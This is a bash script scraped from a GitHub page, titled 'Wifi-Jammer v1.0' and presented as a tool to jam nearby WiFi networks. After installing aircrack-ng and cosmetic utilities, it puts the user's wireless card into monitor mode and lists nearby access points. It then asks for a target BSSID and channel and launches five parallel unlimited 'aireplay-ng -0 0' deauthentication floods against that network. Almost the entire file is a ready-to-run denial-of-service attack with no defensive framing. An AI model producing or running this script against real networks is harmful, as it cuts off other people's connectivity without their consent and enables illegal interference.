-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathwifi-jammer.sh
240 lines (158 loc) · 5.03 KB
/
wifi-jammer.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
#!/bin/bash
#Wifi-Jammer v1.0
#Coded by:D@rk_Synt@x
#Instagram: its_.error._
#Tool to Jamm Wifi with colourful Outfit
#------------------------------------------------------#
# Author D@rk_Synt@x #
# Instagram its_.error._ #
# Github https://github.com/DarkSyntax7 #
# Follow Me On Instagram!! #
#------------------------------------------------------#
clear
trap 'printf "\n";stop' 2
trap 'exit 130' INT
################
#### Start! ####
################
echo -e "\033[1;91m\n[!]Tool Created By D@rk_Synt@x !!! \n\033[1;m"
read -rsn1 -p"[!]Press any key to continue....";echo
printf "\n"
########################
#### Root Warning ! ####
########################
if [[ $EUID -ne 0 ]]; then
echo -e "\033[1;91m\n[!] Wifi-Jammer must be run as root. Aborting....¯\_(ツ)_/¯ \n\033[1;m";
exit 1;
fi
#####################################
#### Requirements Installation ! ####
#####################################
requirements() {
clear
echo -e "\n[!]Installing Requirements! Please wait...."
sleep 3
printf "\n"
apt-get install ruby
FILE=lolcat-master
if [ -d "$FILE" ]; then
echo "$FILE Already Exist!."
else
wget https://github.com/busyloop/lolcat/archive/master.zip
unzip master.zip
rm master.zip
cd lolcat-master/bin/
gem install lolcat
cd ..
fi
apt-get install pv
apt-get install figlet
apt-get install -y aircrack-ng
apt-get install toilet
apt-get install xterm
sleep 1
clear
}
##################
#### Banner ! ####
##################
banner() {
sleep 2
echo "[!]Requirements Successfully Satisfied!" | pv -qL 15 | lolcat
sleep 2
clear
toilet -f big -F border "Wifi_Jammer" | lolcat
echo " [ BY: D@rk_Synt@x | Instagram: its_.error._ | v1.0 ]" | pv -qL 40 | lolcat
printf "\n"
echo " [ Tool to Jam Full WiFi Network Near-You]" | pv -qL 40 | lolcat
printf "\n"
}
#################################
#### Main Script for Jammer! ####
#################################
main() {
sleep 1
echo -e "[!]Please choose the Network Interface:\n" | pv -qL 40 | lolcat
iwconfig | lolcat
read -p $'\033[1;91m[!]Enter Your Choice: \033[1;m' network_interface
echo -e "\n[~]Your Selected NI Card:~[ $network_interface ]\n" | pv -qL 30 | lolcat
sleep 2
printf "\033[1;91m[!]Your Internet or Wifi is going to disconnect.....[Monitor-Mode] \033[1;m\n" | pv -qL 25
sleep 3
############################
#### Aircrack-ng Script!####
############################
airmon-ng start $network_interface | lolcat
sleep 2
clear
sleep 1
printf "\033[1;91m\n[~]Read Instructions Carefully !! \033[1;m\n" | pv -qL 20
printf "\n"
sleep 1
printf "[1] After These Instructions, Wifi or Networks near you are going to Display!\n" | pv -qL 30 | lolcat
printf "[2] Please Note Your Targets's BSSID and Channel No.(CH) as they are required in next step!\n" | pv -qL 40 | lolcat
printf "[3] After these You have to Stop the xterm Window(Wifi Window) by Pressing Ctrl + C !\n" | pv -qL 40 | lolcat
printf "\n"
read -rsn1 -p"[!]Press Any Key (After reading the Instructions Carefully!):";echo
mon=$(echo "mon")
xterm -hold -e "airodump-ng $network_interface$mon" &
sleep 2
printf "\n"
read -p $'\033[1;91m[!]Please Enter Target BSSID: \033[1;m' BSSID
printf "\n"
echo ">> BSSID: $BSSID" | lolcat
printf "\n"
read -p $'\033[1;91m[!]Please Enter Target CH: \033[1;m' CH
printf "\n"
echo ">> Channel No: $CH" | lolcat
printf "\n"
echo "[!]OK!" | pv -qL 10 | lolcat
sleep 2
clear
printf "\n"
toilet -f term -F border "BSSID: $BSSID CH: $CH" | lolcat
printf "\n"
timeout 3 xterm -hold -e "airodump-ng -c $CH --bssid $BSSID $network_interface$mon" &
echo "Your Channel is Selected, Please Wait...!" | pv -qL 20 | lolcat
printf "\n"
sleep 1
########################
#### Attack Start ! ####
########################
echo "[!]Press Any Key To Start Attack!" | lolcat
read -rsn1 -p'_';echo
sleep 2
#xterminals
for i in 1 2 3 4 5
do
xterm -hold -e "aireplay-ng -0 0 -a $BSSID $network_interface$mon" &
done
}
####################
##### Stop Msg #####
####################
stop() {
printf "\n"
echo "[~]Your Attack Has been Started!!!" | pv -qL 10 | lolcat
sleep 2
printf "\n"
toilet -f term -F border "Thank For Using Wifi-Jammer" | lolcat
printf "\n"
sleep 1
echo "[!]Note:You can type 'sudo airmon-ng stop (network_interface name)mon' to send your NI card from Monitor to Managed Mode!" | lolcat
printf "\n"
echo -e " [ BY: D@rk_Synt@x | Instagram: its_.error._ | v1.0 ]\n" | pv -qL 20 | lolcat
printf "......................................................................................................................" | pv -qL 30 | lolcat
printf "\n"
printf "\n"
}
requirements
banner
main
stop
#------------------------------------------------------#
# Author D@rk_Synt@x #
# Instagram its_.error._ #
# Github https://github.com/DarkSyntax7 #
# Follow Me On Instagram!! #
#------------------------------------------------------#